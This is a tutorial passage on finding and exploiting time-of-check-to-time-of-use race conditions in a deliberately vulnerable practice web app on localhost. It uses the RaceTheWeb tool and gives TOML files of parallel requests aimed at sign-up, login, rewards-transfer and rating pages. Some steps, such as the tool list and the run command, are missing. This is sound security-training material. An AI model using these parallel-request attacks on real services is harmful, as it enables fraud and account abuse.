More Tools

Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:

We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from https://github.com/aaronhnatiw/race-the-web/releases

Which version to download? It depends on the operating-system you are running

On Linux and macOS machines, you need to make the file executable.

Running RacetheWeb is easy:

1. Open command prompt/Terminal

2. Navigate to the directory where you have extracted/downloaded the executable binary file

3. Run the following command:

race-the-web portion:

Depending on the operating-system you are using, the race-the-web portion needs to be changed.

<toml-file> portion:

TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them.

Find TOML file for some of the TimeGap Theory challenges below:

Sign Up page

# Sign Up

count = 10
verbose = false

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/sign-up.php"
   body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"

In the above TOML file:

• Count defines how many requests RaceTheWeb tools would be sending in parallel

• Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false

• Method defines the type of the request. This can be GET, POST, PUT, DELETE etc.

• URL is, well, the url at which request needs to be sent

• Body of the request. You can skip this part if there is no body that needs to be submitted

Sign In page

# Sign In Page

count = 1
verbose = true

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=1234&submit=Submit"

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=password&submit=Submit"

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/login.php"
   body = "email=tom%40sechow.com&password=tom&submit=Submit"

In the above TOML file:

• Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests

• First two requests have wrong password in the request body

Transfer rewards page

# Transfer Rewards

count = 10
verbose = false

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
   body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"

Ratings page

# Ratings page

count = 1
verbose = false

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
   cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]

[[requests]]
   method = "POST"
   url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
   body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
   cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]

In the above TOML file, we are sending a cookie as well.

Now you know:

1. Various open-source tools and techniques for finding and exploiting TOCTOU security issues

2. How to use RaceTheWeb tool for exploiting TOCTOU security issues

3. Writing TOML files for RaceTheWeb tool